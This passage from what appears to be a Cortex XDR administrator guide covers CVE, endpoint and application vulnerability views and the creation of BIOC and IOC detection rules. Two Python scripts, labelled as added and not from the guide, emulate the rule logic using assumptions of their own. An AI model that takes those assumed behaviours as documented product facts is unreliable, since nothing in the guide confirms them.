To evaluate the extent and severity of each CVE across your endpoints, you can drill down into each CVE
in Cortex XDR and view all the endpoints and applications in your environment that are impacted by the
CVE. Cortex XDR retrieves the latest information from the NIST public database. From Add-ons > Host
Insights > Vulnerability Assessment, select CVEs on the upper-right bar. For each vulnerability, Cortex XDR
displays the following default and optional values:

Value    Description
Affected endpoints    The number of endpoints that are currently affected by this CVE. For excluded CVEs, the affected endpoints are N/A.
Applications    The names of the applications affected by this CVE.
CVE    The name of the CVE.
Description    The general NIST description of the CVE.
Excluded    Indicates whether this CVE is excluded from all endpoint and application views and filters, and from all Host Insights widgets.
Platforms    The name and version of the operating system affected by this CVE.
Severity    The severity level (High, Medium, or Low) of the CVE as ranked in the NIST database.
Severity score    The CVE severity score based on the NIST Common Vulnerability Scoring System (CVSS). Click the score to see the full CVSS description.

You can perform the following actions from Cortex XDR as you analyze the existing vulnerabilities:
• View a complete list of all endpoints in your network that are impacted by a CVE—Right-click the CVE
and View affected endpoints.
• Learn more about the applications in your network that are impacted by a CVE—Right-click the CVE
and View applications.
• Exclude irrelevant CVEs from your endpoints and applications analysis—Right-click the CVE and
Exclude. You can add a comment if needed, as well as Report CVE as incorrect for further analysis and
investigation by Palo Alto Networks. The CVE is grayed out and labeled Excluded and no longer appears
on the Endpoints and Applications views in Vulnerability Assessment, or in the Host Insights widgets.
To restore the CVE, you can right-click the CVE and Undo exclusion at any time.

The CVE is removed from or reinstated to all views, filters, and widgets after the next
vulnerabilities recalculation.

Endpoint Analysis
To help you assess the vulnerability status of an endpoint, Cortex XDR provides a full list of all installed
applications and existing CVEs per endpoint and also assigns each endpoint a vulnerability severity score
that reflects the highest NIST vulnerability score detected on the endpoint. This information helps you
to determine the best course of action for remediating each endpoint. From Add-ons > Host Insights >
Vulnerability Assessment, select Endpoints on the upper-right bar. For each endpoint, Cortex XDR displays
the following default and optional values:

Value    Description
CVEs    A list of all CVEs that exist on applications that are installed on the endpoint.
    Cortex XDR displays a maximum of 500 CVEs per endpoint. If your endpoint has more than 500 CVEs, you must address some of them to reduce the number of CVEs and rescan the endpoint. Then, additional CVEs can be displayed.
Endpoint ID    Unique ID assigned by Cortex XDR that identifies the endpoint.
Endpoint name    Hostname of the endpoint.
Last Reported Timestamp    The date and time of the last time the Cortex XDR agent started the process of reporting its application inventory to Cortex XDR.
MAC address    The MAC address associated with the endpoint.
IP address    The IP address associated with the endpoint.
Platform    The name of the platform running on the endpoint.
Severity    The severity level (High, Medium, or Low) of the CVE as ranked in the NIST database.
Severity score    The CVE severity score based on the NIST Common Vulnerability Scoring System (CVSS). Click the score to see the full CVSS description.

You can perform the following actions from Cortex XDR as you investigate and remediate your endpoints:

• View a complete list of all applications installed on an endpoint—Right-click the endpoint and View
installed applications. This list includes the application name, version, and installation path on the
endpoint. If an installed application has known vulnerabilities, Cortex XDR also displays the list of CVEs
and the highest Severity.
• (Windows only) Isolate an endpoint from your network—Right-click the endpoint and Isolate the
endpoint before or during your remediation to allow the Cortex XDR agent to communicate only with
Cortex XDR.
• (Windows only) View a complete list of all KBs installed on an endpoint—Right-click the endpoint and
View installed kbs. This list includes all the Microsoft Windows patches that were installed on the
endpoint and a link to the Microsoft official Knowledge Base (KB) support article.
• Retrieve an updated list of applications installed on an endpoint—Right-click the endpoint and Rescan
endpoint.

Application Analysis
You can assess the vulnerability status of applications in your network using the Host inventory. Cortex
XDR compiles an application inventory of all the applications installed in your network by collecting from
each Cortex XDR agent the list of installed applications. For each application on the list, you can see the
existing CVEs and the vulnerability severity score that reflects the highest NIST vulnerability score detected
for the application. Any new application installed on an endpoint appears in Cortex XDR within 24 hours.
Alternatively, you can rescan the endpoint to retrieve the most up-to-date list.

Starting with macOS 10.15, Mac built-in system applications are not reported by the Cortex
XDR agent and are not part of the Cortex XDR Application Inventory.

From Add-ons > Host Insights > Vulnerability Assessment, select Apps. For each application, Cortex XDR
displays the following default and optional values:

Value    Description
Affected endpoints    The number of endpoints that are currently affected by this CVE.
Application name    The name of the application affected by this CVE.
CVEs    A list of all CVEs that exist on applications that are installed on the endpoint.
    Cortex XDR displays a maximum of 500 CVEs per endpoint. If your endpoint has more than 500 CVEs, you must address some of them to reduce the number of CVEs and rescan the endpoint. Then, additional CVEs can be displayed.
Platform    A list of all platforms on which the application is installed.
Severity    The severity level (High, Medium, or Low) of the CVE as ranked in the NIST database.
Severity score    The CVE severity score based on the NIST Common Vulnerability Scoring System (CVSS). Click the score to see the full CVSS description.
Version    The version of the installed application.

• To view the details of all the endpoints in your network on which an application is installed, right-click
the application and View endpoints.

Investigation and Response
> Cortex XDR Indicators
> Search Queries
> Investigate Incidents
> Investigate Alerts
> Investigate Endpoints
> Investigate Files
> Response Actions

Cortex XDR Indicators
When you identify a threat, you can define specific indicators for which you want Cortex XDR to raise
alerts. You can define rules for the following types of indicators:
• Behavioral indicators of compromise (BIOCs)—Identifying threats based on their behaviors can be quite
complex. As you identify specific network, process, file, or registry activity that indicates a threat, you
create BIOCs that can alert you when the behavior is detected. If you have Cortex XDR - Analytics
enabled, Cortex XDR can also raise Analytics BIOCs (ABIOCs).
• Indicators of compromise (IOCs)—Known artifacts that are considered malicious or suspicious. IOCs are
static and based on criteria such as SHA256 hashes, IP addresses and domains, file names, and paths.
You create IOC rules based on information that you gather from various threat-intelligence feeds or that
you gather as a result of an investigation within Cortex XDR. See Working with IOCs.
After you create an indicator rule, you can Manage Existing Indicators from Cortex XDR.

Working with BIOCs


Behavioral indicators of compromise (BIOCs) enable you to alert on and respond to behaviors—tactics,
techniques, and procedures. Instead of hashes and other traditional indicators of compromise, BIOC rules
detect behavior related to processes, registry, files, and network activity.
To enable you to take advantage of the latest threat research, Cortex XDR automatically receives
preconfigured rules from Palo Alto Networks. These global rules are delivered to all tenants with content
updates. In cases where you need to override a global BIOC rule, you can disable it or set a rule exception.
You can also configure additional BIOC rules as you investigate threats on your network and endpoints.
BIOC rules are highly customizable: you can create a BIOC rule that is simple or quite complex.
As soon as you create or enable a BIOC rule, the app begins to monitor input feeds for matches. Cortex
XDR also analyzes historical data collected in the Cortex Data Lake. Whenever there is a match, or hit, on a
BIOC rule, Cortex XDR logs an alert (see Cortex XDR Alerts).
To further enhance the BIOC rule capabilities, you can also configure BIOC rules as custom prevention
rules and incorporate them with your Restrictions profiles. Cortex XDR can then raise behavioral threat
prevention alerts based on your custom prevention rules in addition to the BIOC detection alerts.
• BIOC Rule Details
• Create a BIOC Rule
• Manage Existing Indicators
• Manage Global BIOC Rules

BIOC Rule Details


If you are assigned a role that enables Investigation > Rules privileges, you can view all user-defined and
preconfigured rules for behavioral indicators of compromise (BIOCs) from Rules > BIOC.

If you have Cortex XDR - Analytics enabled, Cortex XDR also provides a separate page from which you can
view Analytics BIOCs (ABIOCs). To access this page, use the link next to the refresh icon at the top of the
page.
Each page displays fields that are relevant for the specific rule type. For more information, see:
• BIOC Rules Fields
• Analytics BIOC Fields
BIOC Rules Fields
By default, the BIOC Rules page displays all enabled rules. To search for a specific rule, use the filters above
the results table to narrow the results. From the BIOC Rules page, you can also manage existing rules using
the right-click pivot menu.
The following table describes the fields that are available for each BIOC rule in alphabetical order.

Field    Description
# OF HITS    The number of hits (matches) on this rule.
BACKWARDS SCAN STATUS    Status of the Cortex XDR search for the first 10,000 matches when the BIOC rule was created or edited. Status can be:
    • Done
    • Failed
    • Pending
    • Queued
BACKWARDS SCAN TIMESTAMP    Timestamp of the Cortex XDR search for the first 10,000 matches in your Cortex XDR when the BIOC rule was created or edited.
BACKWARDS SCAN RETRIES    Number of times Cortex XDR searched for the first 10,000 matches in your Cortex XDR when the BIOC rule was created or edited.
BEHAVIOR    A schematic of the behavior of the rule.
COMMENT    Free-form comments specified when the BIOC was created or modified.
EXCEPTIONS    Exceptions to the BIOC rule. When there's a match on the exception, the event will not trigger an alert.
GLOBAL RULE ID    Unique identification number assigned to rules created by Palo Alto Networks.
INSERTION DATE    Date and time when the BIOC rule was created.
MITRE ATT&CK TACTIC    Displays the type of MITRE ATT&CK tactic the BIOC rule is attempting to trigger on.
MITRE ATT&CK TECHNIQUE    Displays the type of MITRE ATT&CK technique and sub-technique the BIOC rule is attempting to trigger on.
MODIFICATION DATE    Date and time when the BIOC was last modified.
NAME    Unique name that describes the rule. Global BIOC rules defined by Palo Alto Networks are indicated with a blue dot and cannot be modified or deleted.
RULE ID    Unique identification number for the rule.
TYPE    Type of BIOC rule:
    • Collection
    • Credential Access
    • Dropper
    • Evasion
    • Execution
    • Evasive
    • Exfiltration
    • File Privilege Manipulation
    • File Type Obfuscation
    • Infiltration
    • Lateral Movement
    • Other
    • Persistence
    • Privilege Escalation
    • Reconnaissance
    • Tampering
SEVERITY    BIOC severity that was defined when the BIOC was created.
SOURCE    User who created this BIOC, the file name from which it was created, or Palo Alto Networks if delivered through content updates.
STATUS    Rule status: Enabled or Disabled.
USED IN PROFILES    Displays if the BIOC rule is associated with a Restriction profile.

Analytics BIOC Fields


By default, the Analytics BIOC Rules page displays all enabled rules. To search for a specific rule, use the
filters above the results table to narrow the results. From the Analytics BIOC Rules page, you can also
disable and enable rules using the right-click pivot menu.
The following table describes the fields that are available for each Analytics BIOC rule in alphabetical order.

Field    Description
Description    Description of the behavior that will raise the alert.
GLOBAL RULE ID    Unique identification number assigned to rules created by Palo Alto Networks.
INSERTION DATE    Date and time when the BIOC rule was created.
MITRE ATT&CK TACTIC    Displays the type of MITRE ATT&CK tactic the BIOC rule is attempting to trigger on.
MITRE ATT&CK TECHNIQUE    Displays the type of MITRE ATT&CK technique and sub-technique the BIOC rule is attempting to trigger on.
MODIFICATION DATE    Date and time when the BIOC was last modified.
NAME    Unique name that describes the rule. New rules are identified with a blue badge icon.
SEVERITY    BIOC severity that was defined when the BIOC was created.
STATUS    Rule status: Enabled or Disabled.

Create a BIOC Rule


After identifying a threat and its characteristics, you can configure rules for behavioral indicators of
compromise (BIOCs). After you create a BIOC rule, Cortex XDR searches for the first 10,000 matches in
your Cortex Data Lake and raises an alert if a match is detected. Going forward, the app alerts when a new
match is detected.

To ensure your BIOC rules raise alerts efficiently and do not overcrowd your Alerts table,
Cortex XDR automatically disables BIOC rules that reach 5000 or more hits over a 24 hour
period.

• Create a Rule from Scratch
• Configure a Custom Prevention Rule
• Import Rules
Create a Rule from Scratch
Creating a new BIOC rule is similar to the way you create a search with Query Builder. You use XQL to
define the rule. The XQL query must at a minimum filter on the event_type field in order for it to be a
valid BIOC rule. For example:

dataset = xdr_data
| filter event_type = PROCESS and
event_sub_type = PROCESS_START and
action_process_image_name ~= ".*?\.(?:pdf|docx)\.exe"

Only the filter stage is supported for XQL queries that define a BIOC.

The following describes the event_type values for which you can create a BIOC rule:

• FILE—Events relating to file create, write, read, and rename according to the file name and path.
• INJECTION—Events related to process injections.
• LOAD_IMAGE—Events relating to module IDs of processes.
• NETWORK—Events relating to incoming and outgoing network activity, including IP addresses, port, host
name, and protocol.
• PROCESS—Events relating to execution and injection of a process name, hash, path, and CMD.
• REGISTRY—Events relating to registry write, rename and delete according to registry path.
• STORY—Events relating to a combination of firewall and endpoint logs over the network.
• WINDOWS_EVENT_LOG—Events relating to Windows Event Log.
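To see how the example filter above behaves before it is saved as a rule, the following Python script is an added example (not part of this guide or of Cortex XDR) that emulates the XQL filter over a few constructed process events and then applies the guide's auto-disable threshold of 5000 hits in 24 hours to the resulting hit stream. It assumes that the XQL ~= operator is an unanchored regular-expression match, which Python's re.search reproduces; the field names are the ones used in the query above.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed sample events shaped like the xdr_data fields the example
# rule filters on; these are not real telemetry.
SAMPLE_EVENTS = [
    {"event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "action_process_image_name": "Invoice_2020.pdf.exe"},
    {"event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "action_process_image_name": "agenda.docx.exe"},
    # Same image name, but not a process start: the rule must not match.
    {"event_type": "PROCESS", "event_sub_type": "PROCESS_STOP",
     "action_process_image_name": "Invoice_2020.pdf.exe"},
    # Right name, wrong event_type: a BIOC rule filters on event_type first.
    {"event_type": "FILE", "event_sub_type": "FILE_CREATE",
     "action_process_image_name": "agenda.docx.exe"},
    # A legitimate document reader: no double extension, no hit.
    {"event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "action_process_image_name": "AcroRd32.exe"},
]

# The regular expression from the XQL example: an executable whose name
# carries a document extension immediately before ".exe".
DOUBLE_EXTENSION = re.compile(r".*?\.(?:pdf|docx)\.exe")


def bioc_matches(event):
    """Emulate the filter stage of the example BIOC rule for one event.

    Assumption: XQL's ~= is an unanchored regex match, hence re.search.
    """
    return (
        event.get("event_type") == "PROCESS"
        and event.get("event_sub_type") == "PROCESS_START"
        and DOUBLE_EXTENSION.search(event.get("action_process_image_name", ""))
        is not None
    )


def evaluate_rule(events):
    """Return the events that would produce a hit on the rule."""
    return [e for e in events if bioc_matches(e)]


class HitBudget:
    """Sliding-window hit counter modelling the documented auto-disable.

    The guide states that a BIOC rule reaching 5000 or more hits over a
    24 hour period is disabled automatically; this reproduces that check
    locally so a noisy draft rule can be spotted on a sample of historical
    events before it is saved.
    """

    def __init__(self, limit=5000, window=timedelta(hours=24)):
        self.limit = limit
        self.window = window
        self.enabled = True
        self._hits = deque()  # timestamps of hits inside the window

    def record(self, when):
        """Record a hit at time `when`; return True while the rule stays enabled."""
        if not self.enabled:
            return False
        cutoff = when - self.window
        while self._hits and self._hits[0] < cutoff:
            self._hits.popleft()
        self._hits.append(when)
        if len(self._hits) >= self.limit:
            self.enabled = False
        return self.enabled


def simulate(events, start, spacing=timedelta(minutes=1), limit=5000):
    """Feed the rule's hits (one event per `spacing`) to a HitBudget."""
    budget = HitBudget(limit=limit)
    when = start
    for event in events:
        if bioc_matches(event):
            budget.record(when)
        when += spacing
    return budget.enabled


if __name__ == "__main__":
    for hit in evaluate_rule(SAMPLE_EVENTS):
        print("hit:", hit["action_process_image_name"])
    print("rule still enabled after sample:",
          simulate(SAMPLE_EVENTS, datetime(2020, 11, 2, 9, 0)))
```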
To create a BIOC rule:

STEP 1 | From Cortex XDR, select Rules > BIOC.

STEP 2 | Select + Add Rule.

STEP 3 | Configure the BIOC criteria.


Define any relevant activity or characteristics for the entity type. Creating a new BIOC rule is similar to
the way that you create a search with Query Builder. You use XQL to define the rule. The XQL query
must filter on an event_type in order for it to be a valid BIOC rule.

STEP 4 | Test your BIOC rule.


Rules that you do not refine enough can create thousands of alerts. As a result, it is highly recommended
that you test the behavior of a new or edited BIOC rule before you save it. For example, if a rule will
return thousands of hits because you negated a single parameter, it is a good idea to test the rule before
you save it and make it active.
When you test the rule, Cortex XDR immediately searches for rule matches across all your Cortex Data
Lake data. If there are surprises, now is the time to see them and adjust the rule definition.

For the purpose of showing you the expected behavior of the rule before you save it,
Cortex XDR tests the BIOC on historical logs. After you save a BIOC rule, it will operate
on both historical logs (up to 10,000 hits) and new data received from your log sensors.

STEP 5 | Save your BIOC rule.

STEP 6 | Define your BIOC properties.


1. Enter a descriptive Name to identify the BIOC rule.
2. Select a rule TYPE which describes the activity.
3. Specify the SEVERITY you want to associate with the alert.
4. (Optional) Select the MITRE Tactic and MITRE Technique you want to associate with the alert. You
can select up to 3 MITRE Tactics and MITRE Techniques/Sub-Techniques.
5. Enter any additional comments such as why you created the BIOC.
6. Click OK.

STEP 7 | Save your BIOC rule.

Configure a Custom Prevention Rule


Custom prevention rules are supported on Cortex XDR agent 7.2 and later versions and enable you to
configure and apply user-defined BIOC rules to Restriction profiles deployed on your Windows, Mac, and
Linux endpoints.

By using the BIOC rules, you can configure custom prevention rules to terminate the causality chain of a
malicious process according to the Action Mode defined in the associated Restrictions Security Profile and
trigger Cortex XDR Agent behavioral prevention type alerts in addition to the BIOC rule detection alerts.
For example, if you configure a custom prevention rule for a BIOC Process event and apply it to a Restrictions
profile with an action mode set to Block, the Cortex XDR agent:
• Blocks a process at the endpoint level according to the defined rule properties.
• Raises a behavioral prevention alert you can monitor and investigate in the Alerts table.
Before you configure a BIOC rule as a custom prevention rule, create a Restriction Profile for each type of
operating system (OS) to which you want to deploy your prevention rules.
To configure a BIOC rule as a prevention rule:

STEP 1 | In the BIOC Rule table, from the Source field, filter and locate a user-defined rule you want to
apply as a custom prevention rule. You can only apply a BIOC rule that you created either from
scratch or a Cortex XDR Global Rule template that meets the following criteria:
• The user-defined BIOC rule event does not include the following field configurations:
• All Events—Host Name
• File Event—Device Type, Device Serial Number
• Process Event—Device Type, Device Serial Number
• Registry Event—Country, Raw Packet
• BIOC rules with OS scope definitions must align with the Restrictions profile OS.
• When defining the Process criteria for a user-defined BIOC rule event type, you can select to run
only on actor, causality, and OS actor on Windows, and causality and OS actor on Linux and Mac.

STEP 2 | Test your BIOC rule.


Rules that you do not refine enough can create thousands of alerts. As a result, it is highly recommended
that you test the behavior of a new or edited BIOC rule before you save it. Cortex XDR automatically
disables BIOC rules that reach 5000 or more hits over a 24 hour period.

STEP 3 | Right-click and select Add to restrictions profile.


If the rule is already referenced by one or more profiles, select See profiles to view the profile names.

STEP 4 | In the Add to Restrictions Profile pop-up:


• Ensure the rule you selected is compatible with the type of endpoint operating system.
• Select the Restriction Profile name you want to apply the BIOC rule to for each of the operating
systems. BIOC event rules of type Event Log and Registry are only supported by Windows OS.

You can only add to existing profiles that you created; Cortex XDR Default profiles do not
appear as an option.

STEP 5 | Add the BIOC rule to the selected profiles.


The BIOC rule is now configured as a custom prevention rule and applied to your Restriction profiles.
After the Restriction profile is pushed to your endpoints, the custom prevention rule can start triggering
behavioral prevention type alerts.

STEP 6 | Review and edit your custom prevention rules.


1. Navigate to Endpoints > Policy Management > Profiles.
2. Locate the Restrictions Profile to which you applied the BIOC rule. In the Summary field, Custom
Prevention Rules appears as Enabled.

3. Right-click and select Edit.
4. In the Custom Prevention Rules section, you can review and modify the following:
• Action Mode—Select to Enable or Disable the BIOC prevention rules.
• Auto-disable—Select whether to auto-disable a BIOC prevention rule if it triggers more than a defined
number of times during a defined duration.

Auto-disable will turn off both the BIOC rule detection and the BIOC prevention
rule.
• Prevention BIOC Rules table—Filter and maintain the BIOC rules applied to this specific
Restriction Profile. Right-click to Delete a rule or Go to BIOC Rules table.
5. Save your changes if necessary.
6. Investigate the BIOC prevention rules alerts.

Navigate to Investigation > Incidents > Alerts Table.
• Filter the fields as follows:
• Alert Source: XDR Agent
• Action: Prevention (<profile action mode>)
• Alert Name: Behavioral Threat
• In the Description field you can see the rule name that raised the prevention alert.

Import Rules
You can use the import feature of Cortex XDR to import BIOCs from external feeds or that you previously
exported. The export/import capability is useful for rapid copying of BIOCs across different Cortex XDR
instances.

You can only import files that were exported from Cortex XDR. You cannot edit an exported
file.

STEP 1 | From Cortex XDR, select Rules > BIOC.

STEP 2 | Select Import Rules.

STEP 3 | Drag and drop the file on the import rules dialog or browse to a file.

STEP 4 | Click Import.


Cortex XDR loads any BIOC rules. This process may take a few minutes depending on the size of the file.

STEP 5 | Refresh the BIOC Rules page to view matches (# of Hits) in your historical data.

STEP 6 | To investigate any matches, view the Alerts page and filter the Alert Name by the name of the
BIOC rule.

Manage Global BIOC Rules


Cortex XDR checks for the latest update of global BIOC rules. If there are no new global BIOC rules, the
app displays a content status of Content up to date next to the BIOC rules table heading. A dot to the
left of the rule name indicates a global BIOC rule. You can also view the optional Source field to see which
rules are pushed by Palo Alto Networks.
• Get the latest global BIOC rules.
• Copy a global BIOC rule.

• Add a Rule Exception.

• Get the latest global BIOC rules.


1. Navigate to Rules > BIOC.
2. To view the content details, hover over the status to show the global rules version number and last
check date.

The content status displays the date when the content was last updated, either automatically or
manually by an administrator.

3. If the status displays Could not check update, click the status to check for updates manually.
The last updated date changes when the download is successful.

• Copy a global BIOC rule.


You cannot directly modify a global rule, but you can copy global rules as a template to create new rules.
1. Locate a Palo Alto Networks Source type rule, right-click and select Save as New.
2. Review and modify the BIOC properties as needed.
3. Select OK to save the rule.
The rule appears in the BIOC Rules table as a user-defined Source type rule which you can edit.

• Add a Rule Exception.


Although you cannot edit global rules, you can add exceptions to the rule, if needed.

Working with IOCs


IOCs provide the ability to alert on known malicious objects on endpoints across the organization. You can
load IOC lists from various threat-intelligence sources into the Cortex XDR app or define them individually.

Cortex XDR supports a maximum of 4,000,000 IOCs.

You can define the following types of IOCs:
• Full path
• File name
• Domain
• Destination IP address
• MD5 hash
• SHA256 hash
After you define or load IOCs, the app checks for matches in the endpoint data collected from Cortex XDR
agents. Checks are both retroactive and ongoing: the app looks for IOC matches in all data collected in the
past and continues to evaluate any new data it receives in the future.
Alerts for IOCs are identified by a source type of IOC (see Cortex XDR Alerts for more information).
• IOC Rule Details
• Create an IOC Rule
• Manage Existing Indicators

IOC Rule Details


From the Rules > IOC page, you can view all indicators of compromise (IOCs) configured in or uploaded
to the Cortex XDR app. To narrow the list of IOC rules you see, you can filter by one or more
fields in the IOC rules table. From the IOC page, you can also manage or clone existing rules.

The following table describes the fields that are available for each IOC rule in alphabetical order.

Field    Description
# OF HITS    The number of hits (matches) on this indicator.
CLASS    The IOC's class. For example, 'Malware'.
COMMENT    Free-form comments specified when the IOC was created or modified.
EXPIRATION DATE    The date and time at which the IOC will be removed automatically.
INDICATOR    The indicator value itself. For example, if the indicator type is a destination IP address, this could be an IP address such as 1.1.1.1.
INSERTION DATE    Date and time when the IOC was created.
MODIFICATION DATE    Date and time when the IOC was last modified.
RELIABILITY    Indicator's reliability level:
    • A - Completely Reliable
    • B - Usually Reliable
    • C - Fairly Reliable
    • D - Not Usually Reliable
    • E - Unreliable
REPUTATION    Indicator's reputation level. One of Unknown, Good, Bad, or Suspicious.
RULE ID    Unique identification number for the rule.
SEVERITY    IOC severity that was defined when the IOC was created.
SOURCE    User who created this IOC, or the file name from which it was created, or one of the following keywords:
    • Public API—the indicator was uploaded using the Insert Simple Indicators, CSV or Insert Simple Indicators, JSON REST APIs.
    • XSOAR TIM—the indicator was retrieved from XSOAR.
STATUS    Rule status: Enabled or Disabled.
TYPE    Type of indicator: Full path, File name, Host name, Destination IP, MD5 hash.
VENDORS    A list of threat intelligence vendors from which this IOC was obtained.

Create an IOC Rule


There are two options for creating new IOC rules:
• Configure a single IOC.
• Upload a file, one IOC per line, that contains up to 20,000 IOCs. For example, you can upload multiple
file paths and MD5 hashes for an IOC rule. To help you format the upload file in the syntax that Cortex
XDR will accept, you can download the example file.
If you have a Cortex XDR Pro per Endpoint license, you can upload IOCs using REST APIs in either CSV
or JSON format.

To ensure your IOC rules raise alerts efficiently and do not overcrowd your Alerts table,
Cortex XDR automatically:
• Disables any IOC rules that reach 5000 or more hits over a 24 hour period.
• Creates a Rule Exception based on the PROCESS SHA256 field for IOC rules that hit
more than 100 endpoints over a 72 hour period.

STEP 1 | From Cortex XDR, select Rules > IOC.

STEP 2 | Select + Add IOC.

STEP 3 | Configure the IOC criteria.

If after investigating a threat, you identify a malicious artifact, you can create an alert for the Single IOC
right away.
1. Configure the INDICATOR value on which you want to match.
2. Configure the IOC TYPE. Options are Full Path, File Name, Domain, Destination IP, and MD5 or
SHA256 Hash.
3. Configure the SEVERITY you want to associate with an alert for the IOC: Informational, Low,
Medium, or High.
4. (Optional) Enter a comment that describes the IOC.
5. (Optional) Configure the IOC's REPUTATION.
6. (Optional) Configure the IOC's RELIABILITY.
7. (Optional) Enter an EXPIRATION for the IOC. Options are Default, Specific Expiration Date, No
Expiration.
8. Click Create.
If you want to match on multiple indicators, you can upload the criteria in a CSV file.
1. Select Upload File.
2. Drag and drop the CSV file containing the IOC criteria in the drop area of the Upload File dialog or
browse to the file.
Cortex XDR supports a file with multiple IOCs in a pre-configured format. For help determining the
format syntax, Cortex XDR provides an example text file that you can download.

3.
4. Configure the SEVERITY you want to associate with an alert for the IOCs: Informational, Low,
Medium, or High.
5. Define the DATA FORMAT of the IOCs in the CSV file. Options are Mixed, Full Path, File Name,
Domain, Destination IP, and MD5 or SHA256 Hash.
6. (Optional) Configure the IOC's REPUTATION.
7. (Optional) Configure the IOC's RELIABILITY.
8. (Optional) Enter an EXPIRATION for the IOC. Options are Default, Specific Expiration Date, No
Expiration.
9. Click Upload.

STEP 4 | (Optional) Define any expiration criteria for your IOC rules.
If desired, you can also configure additional expiration criteria per IOC type that apply to all IOC rules. In
most cases, IOC types like Destination IP or Host Name are considered malicious only for a short period
of time, since they are soon cleaned and then used by legitimate services, from which time they only
cause false positives. For these types of IOCs, you can set a defined expiration period. The expiration
criteria you define for an IOC type apply to all existing rules and to any additional rules that you create in
the future. By default, Cortex XDR does not apply an expiration date to IOCs.
1. Select Default Rule Expiration.
2. Set the expiration for any relevant IOC type. Options are Never, 1 week, 1 month, 3 months, or 6
months.
3. Click Save.
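The two safeguards the guide describes for short-lived indicators, a default expiration per IOC type and the automatic Rule Exception on the PROCESS SHA256 field once a rule hits more than 100 endpoints in 72 hours, are worked through below in an added Python example that is not part of this guide or of Cortex XDR. The event field names, the per-type expiration policy and the way the excepted hash is chosen (the process hash behind most of the recent hits, on the assumption that one benign process fanning out across endpoints is the usual cause) are all assumptions made for the example.

```python
from collections import Counter
from datetime import datetime, timedelta

# Event field compared for each IOC type the guide lists. These field
# names are constructed for the example, not Cortex XDR schema names.
EVENT_FIELD = {
    "Full path": "file_path",
    "File name": "file_name",
    "Domain": "dst_domain",
    "Destination IP": "dst_ip",
    "MD5 hash": "file_md5",
    "SHA256 hash": "file_sha256",
}

# The expiration choices offered per IOC type (Never, 1 week, 1 month,
# 3 months, 6 months). Cortex XDR applies no expiration by default; the
# Destination IP and Domain defaults below are a constructed policy of the
# kind the guide suggests for IOC types that quickly turn into false positives.
EXPIRATION_OPTIONS = {
    "Never": None,
    "1 week": timedelta(weeks=1),
    "1 month": timedelta(days=30),
    "3 months": timedelta(days=90),
    "6 months": timedelta(days=180),
}
DEFAULT_RULE_EXPIRATION = {"Destination IP": "1 week", "Domain": "1 month"}

EXCEPTION_ENDPOINTS = 100            # "more than 100 endpoints"
EXCEPTION_WINDOW = timedelta(hours=72)


class IocRule:
    """One IOC rule with expiration and the endpoint-spread auto-exception."""

    def __init__(self, indicator, ioc_type, inserted):
        self.indicator = indicator.lower()
        self.ioc_type = ioc_type
        self.inserted = inserted
        ttl = EXPIRATION_OPTIONS[DEFAULT_RULE_EXPIRATION.get(ioc_type, "Never")]
        self.expires = None if ttl is None else inserted + ttl
        self.exceptions = set()   # process SHA256 values excepted from the rule
        self.hits = []            # (timestamp, endpoint_id, process_sha256)

    def is_expired(self, now):
        return self.expires is not None and now >= self.expires

    def match(self, event):
        """Return True if the event is a hit; maintain the auto-exception."""
        now = event["ts"]
        if self.is_expired(now):
            return False
        if event.get("process_sha256") in self.exceptions:
            return False
        observed = str(event.get(EVENT_FIELD[self.ioc_type], "")).lower()
        if observed != self.indicator:
            return False
        self._record(now, event["endpoint_id"], event.get("process_sha256"))
        return True

    def _record(self, now, endpoint_id, process_sha256):
        self.hits.append((now, endpoint_id, process_sha256))
        cutoff = now - EXCEPTION_WINDOW
        self.hits = [h for h in self.hits if h[0] >= cutoff]
        if len({h[1] for h in self.hits}) <= EXCEPTION_ENDPOINTS:
            return
        # Assumption: except the process hash responsible for most recent
        # hits, then drop its hits from the window so the rule keeps
        # alerting on other processes touching the same indicator.
        counts = Counter(h[2] for h in self.hits if h[2])
        if not counts:
            return
        top_hash = counts.most_common(1)[0][0]
        self.exceptions.add(top_hash)
        self.hits = [h for h in self.hits if h[2] != top_hash]


def constructed_fanout(indicator, endpoints, start, process_sha256):
    """One Destination IP match per endpoint, one minute apart (constructed)."""
    return [
        {"ts": start + timedelta(minutes=i), "endpoint_id": f"ep-{i:04d}",
         "dst_ip": indicator, "process_sha256": process_sha256}
        for i in range(endpoints)
    ]


def run_rule(rule, events):
    """Return the number of hits the rule produced over the events."""
    return sum(1 for e in events if rule.match(e))


if __name__ == "__main__":
    t0 = datetime(2020, 11, 2, 9, 0)
    rule = IocRule("203.0.113.10", "Destination IP", t0)  # constructed IP
    print("hits:", run_rule(rule, constructed_fanout(rule.indicator, 101, t0, "a" * 64)))
    print("auto-exceptions:", rule.exceptions, "expires:", rule.expires)
```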

Manage Existing Indicators


After you create an indicator rule, you can take the following actions:

For Analytics BIOC rules, you can only disable and enable rules.

• View Alerts Triggered by a Rule
• Use a BIOC Rule as the Basis of a Query
• Edit a Rule
• Export a Rule (BIOC Only)
• Copy a Rule
• Disable or Remove a Rule
• Add a Rule Exception
• Export a Rule Exception

View Alerts Triggered by a Rule


As your IOC and BIOC rules trigger alerts, Cortex XDR displays the total # OF HITS for each rule on the
BIOC or IOC rules page. For rules with a high, medium, or low severity that have raised one or more
alerts, you can quickly pivot to a filtered view of the alerts raised by the indicator:

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Right-click anywhere in a rule, and then select View associated alerts.
Cortex XDR displays a filtered query of alerts associated with the Rule ID.

Use a BIOC Rule as the Basis of a Query
STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Right-click anywhere in the rule, and then select Open in query builder.
Cortex XDR populates a query using the criteria of the BIOC rule.

STEP 3 | If desired, add or change the query criteria.

STEP 4 | (Optional) Test your query to see the sample results.

STEP 5 | If you are satisfied with the query, Save the query.


For more information, see Manage Your Queries.

Edit a Rule
After you create a rule, it may be necessary to tweak or change the rule settings. You can open the rule
configuration from the Rules page or from the pivot menu of an alert triggered by the rule. To edit the rule
from the Rules page:

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Locate the rule you want to edit.

STEP 3 | Right-click anywhere in the rule and select Edit.

STEP 4 | Edit the rule settings as needed, and then click OK.
If you make any changes, Test and then Save the rule.

Export a Rule (BIOC Only)


STEP 1 | Select RULES > BIOC.

STEP 2 | Select the rules that you want to export.

